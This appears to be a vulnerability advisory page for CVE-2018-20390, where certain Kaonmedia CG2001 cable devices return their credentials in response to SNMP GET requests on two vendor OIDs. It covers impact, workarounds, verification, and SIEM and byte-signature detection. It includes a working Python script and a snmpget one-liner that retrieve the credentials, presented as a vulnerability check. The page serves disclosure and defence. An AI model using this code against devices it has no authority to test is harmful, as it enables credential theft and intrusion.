CVE-2018-20390

9.8 CRITICAL

📋 TL;DR

The affected Kaonmedia CG2001-AN22A, CG2001-UDBNA and CG2001-UN2NA devices answer SNMP GET requests for two vendor OIDs (iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 and iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0) with the device's credentials. Any remote host that can reach UDP/161 and supplies a read community string the device accepts gets the credentials back in the response; no login to the device is required.

💻 Affected Systems

Products:
  • Kaonmedia CG2001-AN22A
  • Kaonmedia CG2001-UDBNA
  • Kaonmedia CG2001-UN2NA
Versions: CG2001-AN22A 1.2.1, CG2001-UDBNA 3.0.8, CG2001-UN2NA 3.0.8
Operating Systems: Embedded firmware
Default Config Vulnerable: ⚠️ Yes
Notes: Vulnerability exists in default SNMP configuration that exposes sensitive OIDs.

📦 What is this software?

Kaonmedia CG2001-AN22A, CG2001-UDBNA and CG2001-UN2NA are embedded network devices that run vendor firmware and expose an SNMP agent for management. The two disclosed OIDs sit under IANA private enterprise number 4491, which is assigned to CableLabs and used for DOCSIS cable-equipment MIBs.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise leading to network infiltration, data theft, and potential use as pivot point for lateral movement.

🟠

Likely Case

Credential theft enabling unauthorized access to device management interfaces and configuration changes.

🟢

If Mitigated

If SNMP is disabled, or restricted to trusted management hosts, exposure is limited to those hosts. The credentials are still returned to anyone who can query the device, so this remains a significant information disclosure and the restriction is a workaround, not a fix.

🌐 Internet-Facing: HIGH - Devices exposed to internet can be scanned and exploited remotely without authentication.
🏢 Internal Only: HIGH - Internal attackers or malware can easily exploit this to gain credentials and escalate privileges.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

A single SNMPv1/v2c GET request for the OIDs iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 and iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 returns the credentials in the response; no device login is involved, and the request fits in one UDP datagram. Public proof-of-concept scripts exist.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: No vendor advisory found

Restart Required: No

Instructions:

No official patch available. Check with Kaonmedia for firmware updates. Consider replacing devices if no fix is provided.

🔧 Temporary Workarounds

Disable SNMP or Restrict Access

Platform: all

Disable the SNMP service entirely, or restrict SNMP (UDP 161) to the management hosts that need it. SNMPv1/v2c carries the community string in cleartext, so a source-address restriction protects more than a stronger community string does.

# Configuration varies by device - check device web interface or CLI for SNMP settings

Change SNMP Community Strings

Platform: all

Replace default community strings (such as public) with strong, unique values, and use SNMPv3 with authentication if the firmware offers it. This only raises the bar: anyone who learns or guesses the community string still retrieves the credentials, so treat it as a complement to access restriction, not a substitute.

# Use device management interface to change SNMP community strings

🧯 If You Can't Patch

  • Isolate affected devices in separate VLAN with strict firewall rules blocking SNMP traffic (UDP 161) from untrusted networks.
  • Implement network monitoring to detect SNMP queries to the vulnerable OIDs and alert on credential exposure attempts.

🔍 How to Verify

Check if Vulnerable:

Use snmpwalk or snmpget to query OIDs iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 and iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0. If the device answers with OCTET STRING values (rather than noSuchObject, noSuchInstance, or a timeout), it is vulnerable.

Check Version:

Check the device web interface, or query sysDescr.0 (1.3.6.1.2.1.1.1.0) over SNMP and compare the reported model and firmware version against the affected list above.

Verify Fix Applied:

After applying workarounds, repeat the query from an untrusted network position: it should time out, be refused by the access control list, or return noSuchObject. A changed community string alone is not evidence the workaround holds; the query must fail from hosts that are not on the allow list.
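The following check carries out both the exploit-status request and the verification steps above in one script. It is an added example for this page, not code from the advisory, from Kaonmedia, or from any published PoC. It builds the SNMPv2c GetRequest by hand (standard library only, framing per RFC 3416), parses the GetResponse, and reports the device as vulnerable only when the two credential OIDs come back as non-empty OCTET STRINGs. The host address, the community string `public`, and the sample replies (`SAMPLE_VULNERABLE`, `SAMPLE_FIXED`, with made-up values) are assumptions for illustration.

```python
"""SNMPv2c GET check for the CVE-2018-20390 OIDs. Added example for this page: not code
from the original advisory, from Kaonmedia or from any published PoC. Standard library
only; message framing follows RFC 3416, so it works against any SNMPv2c agent."""
import socket

CRED_OIDS = ("1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0", "1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0")
SYS_DESCR = "1.3.6.1.2.1.1.1.0"  # sysDescr.0, used for the version check

def _tlv(tag, content):  # BER tag-length-value, short or long-form length
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content

def encode_int(v):  # INTEGER, minimal two's-complement length
    n = 1
    while not -(1 << (8 * n - 1)) <= v < (1 << (8 * n - 1)):
        n += 1
    return _tlv(0x02, v.to_bytes(n, "big", signed=True))

def encode_oid(oid):  # OBJECT IDENTIFIER: first two arcs packed, the rest base-128
    arcs = [int(a) for a in oid.split(".")]
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out += bytes(reversed(chunk))
    return _tlv(0x06, bytes(out))

def _message(community, pdu_tag, request_id, varbind_list):
    pdu = _tlv(pdu_tag, encode_int(request_id) + encode_int(0) + encode_int(0)
               + _tlv(0x30, varbind_list))
    return _tlv(0x30, encode_int(1) + _tlv(0x04, community.encode()) + pdu)  # version 1 = v2c

def build_get(community, oids, request_id=1):
    """GetRequest (0xA0); each varbind carries a NULL (05 00) placeholder value."""
    return _message(community, 0xA0, request_id,
                    b"".join(_tlv(0x30, encode_oid(o) + b"\x05\x00") for o in oids))

def build_response(community, varbinds, request_id=1):
    """GetResponse (0xA2); used here only to fabricate sample replies."""
    return _message(community, 0xA2, request_id,
                    b"".join(_tlv(0x30, encode_oid(o) + _tlv(t, v)) for o, t, v in varbinds))

def _read_tlv(buf, pos):
    tag, n, pos = buf[pos], buf[pos + 1], pos + 2
    if n & 0x80:
        k = n & 0x7F
        n, pos = int.from_bytes(buf[pos:pos + k], "big"), pos + k
    return tag, buf[pos:pos + n], pos + n

def decode_oid(content):
    arcs, val = [content[0] // 40, content[0] % 40], 0
    for b in content[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))

def parse_response(msg):
    """Return (community, error_status, [(oid, value_tag, raw_value), ...])."""
    _, body, _ = _read_tlv(msg, 0)
    _, _, p = _read_tlv(body, 0)        # version
    _, comm, p = _read_tlv(body, p)     # community
    _, pdu, _ = _read_tlv(body, p)      # GetResponse PDU
    _, _, p = _read_tlv(pdu, 0)         # request-id
    _, err, p = _read_tlv(pdu, p)       # error-status
    _, _, p = _read_tlv(pdu, p)         # error-index
    _, vbl, _ = _read_tlv(pdu, p)
    out, p = [], 0
    while p < len(vbl):
        _, vb, p = _read_tlv(vbl, p)
        _, raw_oid, q = _read_tlv(vb, 0)
        tag, val, _ = _read_tlv(vb, q)
        out.append((decode_oid(raw_oid), tag, val))
    return comm.decode(errors="replace"), int.from_bytes(err, "big", signed=True), out

def leaked_credentials(varbinds):
    """Credential OIDs answered with a non-empty OCTET STRING (0x04) mean vulnerable;
    a fixed or restricted agent returns noSuchObject (0x80) / noSuchInstance (0x81)."""
    return {o: v.decode(errors="replace") for o, t, v in varbinds
            if o in CRED_OIDS and t == 0x04 and v}

def snmp_get(host, community="public", oids=CRED_OIDS + (SYS_DESCR,), timeout=3.0):
    """One live GetRequest over UDP/161; use only against devices you may test."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get(community, oids), (host, 161))
        data, _ = s.recvfrom(4096)
    return parse_response(data)

# Constructed sample replies with made-up values (nothing here came from a real device).
SAMPLE_VULNERABLE = build_response("public", [(SYS_DESCR, 0x04, b"CG2001 (constructed)"),
    (CRED_OIDS[0], 0x04, b"admin"), (CRED_OIDS[1], 0x04, b"Passw0rd!")])
SAMPLE_FIXED = build_response("public", [(o, 0x80, b"") for o in CRED_OIDS])
```

Against a live device, `leaked_credentials(snmp_get("192.0.2.10")[2])` (placeholder address) returns the two values on a vulnerable unit and an empty dict once the OIDs are gone or the query is blocked; the sysDescr.0 varbind in the same reply gives the model string for the version check. With net-snmp installed the equivalent one-liner is `snmpget -v2c -c public 192.0.2.10 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0`. Note that a reply from a fixed device is still a reply: only a timeout or ICMP unreachable shows that the access restriction itself is working.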

📡 Detection & Monitoring

Log Indicators:

  • SNMP authentication failures
  • Unusual SNMP query patterns
  • Access from unexpected IP addresses to SNMP port

Network Indicators:

  • SNMP queries to iso.3.6.1.4.1.4491.2.4.1.1.6.1.1.0 or iso.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 OIDs
  • High volume of SNMP traffic to specific devices

SIEM Query:

dest_port=161 AND (oid="1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0" OR oid="1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0")

Field names depend on the SNMP parser feeding the SIEM. Requests arrive at UDP destination port 161, so a filter on source_port=161 only ever sees the device's replies; match the request direction to catch attempts, and the reply direction (source port 161 with a non-empty value for either OID) to confirm a leak.
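The detection logic below, run over constructed sample datagrams, is an added example for this page (not the advisory's own tooling). It needs no SNMP parser: both credential OIDs share the BER-encoded prefix 2b 06 01 04 01 a3 0b 02 04 01 01 06 01 (1.3.6.1.4.1.4491.2.4.1.1.6.1, with enterprise arc 4491 encoded as a3 0b), and the bytes that follow distinguish a GET probe (NULL value, tag 05) from a device reply that actually carried a credential (non-empty OCTET STRING, tag 04). The addresses, ports and the three payloads in `SAMPLE_FLOWS` are constructed for the example, not real captures.

```python
"""Detection of CVE-2018-20390 probes in SNMP datagrams. Added example for this page,
not from the advisory; operates on raw UDP payloads, so no SNMP parser is needed."""

# BER encoding of the OID prefix 1.3.6.1.4.1.4491.2.4.1.1.6.1 shared by both
# credential OIDs: 1.3 -> 2b, 6.1.4.1 -> 06 01 04 01, 4491 -> a3 0b (base-128),
# 2.4.1.1.6.1 -> 02 04 01 01 06 01. The two bytes after it are the last two arcs
# (.1.0 or .2.0), then the value's tag and length.
CRED_OID_PREFIX = bytes.fromhex("2b06010401a30b020401010601")
OID_BASE = "1.3.6.1.4.1.4491.2.4.1.1.6.1"

# Constructed sample datagrams (src, sport, dst, dport, payload); not real captures.
SAMPLE_FLOWS = [
    # Routine NMS poll: v2c GetRequest for sysDescr.0 with community "public".
    ("10.0.0.5", 51000, "10.0.0.20", 161, bytes.fromhex(
        "302602010104067075626c6963a019020101020100020100"
        "300e300c06082b060102010101000500")),
    # Probe: GetRequest for ...6.1.1.0 from an outside host.
    ("198.51.100.7", 40231, "10.0.0.20", 161, bytes.fromhex(
        "302d02010104067075626c6963a020020101020100020100"
        "30153013060f2b06010401a30b02040101060101000500")),
    # The device's GetResponse: OCTET STRING "admin" for that OID (a confirmed leak).
    ("10.0.0.20", 161, "198.51.100.7", 40231, bytes.fromhex(
        "303202010104067075626c6963a225020101020100020100"
        "301a3018060f2b06010401a30b0204010106010100040561646d696e")),
]

def classify(payload):
    """Yield (oid, kind) for every credential-OID varbind in one SNMP payload.
    kind: 'request' for a GET (NULL value), 'leak' when the value is a non-empty
    OCTET STRING (the device answered), 'exception' for noSuchObject and friends."""
    start = 0
    while True:
        i = payload.find(CRED_OID_PREFIX, start)
        if i < 0:
            return
        j = i + len(CRED_OID_PREFIX)
        tail = payload[j:j + 4]  # last two arcs, value tag, value length
        if len(tail) < 4:
            return
        oid = "%s.%d.%d" % (OID_BASE, tail[0], tail[1])
        tag, length = tail[2], tail[3]
        if tag == 0x05:
            kind = "request"
        elif tag == 0x04 and length:
            kind = "leak"
        else:
            kind = "exception"
        yield oid, kind
        start = j

def detect(flows):
    """One alert per matching varbind. Requests are what reach UDP/161, so a
    filter on source_port=161 alone would only ever see the device's replies."""
    alerts = []
    for src, sport, dst, dport, payload in flows:
        direction = "to-agent" if dport == 161 else "from-agent" if sport == 161 else "other"
        for oid, kind in classify(payload):
            alerts.append({"src": src, "dst": dst, "direction": direction,
                           "oid": oid, "kind": kind})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_FLOWS):
        print(alert)
```

Running it on the sample flows yields two alerts: a `request` from 198.51.100.7 toward the agent and a `leak` in the device's reply, while the sysDescr poll produces nothing. The same byte signature can be dropped into any IDS that supports raw content matching on UDP/161 traffic; the `kind` split is what tells an analyst whether the device merely received a probe or actually handed over a credential.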
